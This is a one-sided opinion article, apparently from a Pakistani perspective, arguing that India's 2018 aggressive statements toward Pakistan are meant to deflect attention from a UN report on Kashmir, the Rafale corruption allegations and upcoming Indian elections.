What’s behind India’s Sudden Aggression?

Indian Army Chief, on Saturday evening, warned Pakistani authorities to be ready to face the reaction of their “barbarism”. According to Times of India, Indian Army Chief said,” needs to take stern action to avenge the barbarism that the terrorists and Pakistan Army have been carrying out. Yes, it’s time to give it back in the same coin, not resorting to similar kind of barbarism. But I think the other side must also feel the pain”. This statement came when India canceled the talks between the foreign ministers of two countries. Director General ISPR, Maj. General Ghafoor has declared, in response, that Pakistan, a nuclear power, is ready for war. However, we want to have peace in the region. “Pakistan has sacrificed a lot in the war against terrorism. We will not let anyone destroy the peace of region”, he further added.

So what’s behind this jingoism? Despite of Pakistan’s continuous offers of starting a peace process, India has replied in very contrast manner. There are many theories about this aggressive attitude. Pakistan information minister said that India wants to turn world’s attention from their atrocities in Kashmir. Moreover, he said that Indian government wants to turn their people interest towards more popular topic Pakistan to get away with corruption charges on PM Modi. Let’s look into detail of what could be the hidden ambition behind this Indian attitude.

UN Report on Indian Atrocities in Kashmir:

The illegal occupation of Kashmir has always been the main cause of international embarrassment for India. Firing of pellet guns on unarmed civilians, impunity for Indian forces despite of their illegal acts, and enactment of inhumane laws are just few examples of Indian atrocities. On this matter UN has released a report which has caused a great deal of concerns in international human rights organizations. The reports states:

“ Impunity for human rights violations and lack of access to justice are key human rights challenges in the Indian state of Jammu and Kashmir. Special laws in force in the state, such as the Armed Forces (Jammu and Kashmir) Special Powers Act, 1990 (AFSPA) and the Jammu and Kashmir Public Safety Act, 1978 (PSA), have created structures that obstruct the normal course of law, impede accountability and jeopardize the right to remedy for victims of human rights violations.”

United Nations General Assembly session is going to held next week. Pakistan’s new government is expected to raise the issue on UNGA’s floor. Experts are of the view that this might be the reason to turn Pakistan’s attention away from the main issue.

Corruption Charges:

Indian Prime Minister Modi is currently under the fire due to recent corruption charges against him. He has been alleged to give contract of building Rafael Jet to one of his friend’s corporation. Rahul Gandhi, the opposition leader has announced to start a campaign against the sitting PM. He said that Congress will reside to every possible option to held PM accountable.

Indian General Elections:

Indian general elections are going to held early next year. Currently ruling party, BJP, is popular for its aggressive stand against Pakistan. They used the policy of targeting Pakistan and promising that they will make them pay for their “wrong doings” in last elections. Bharatia Janta Party, which feeds on Hindu radicalism and anti-Muslim stances will repeat their old political strategy. Critics believe that this sudden series of aggressive statements might be the starting point of BJP’s election campaign.

Imran khan, Pakistan’s newly elected PM, announced to overhaul foreign policy of the country. For that, he has visited Saudi Arabia and UAE. Pakistan wants to engage both Iran and Saudi Arabia which is important considering their ongoing Middle-Eastern cold war. In addition to that, Pakistan’s foreign minister had a very fruitful visit of Afghanistan. Pakistan wants to gain confidence of Afghanistan in its efforts against terrorism. Not just that, Pakistan Army Chief’s recent visit to China removed the major concerns raised by many people regarding CPEC. Pakistan is on right track now. Possibility of a war with India is minimum due to nuclear deterrence. Hence this Indian aggressive stance will do nothing bad to Pakistan.
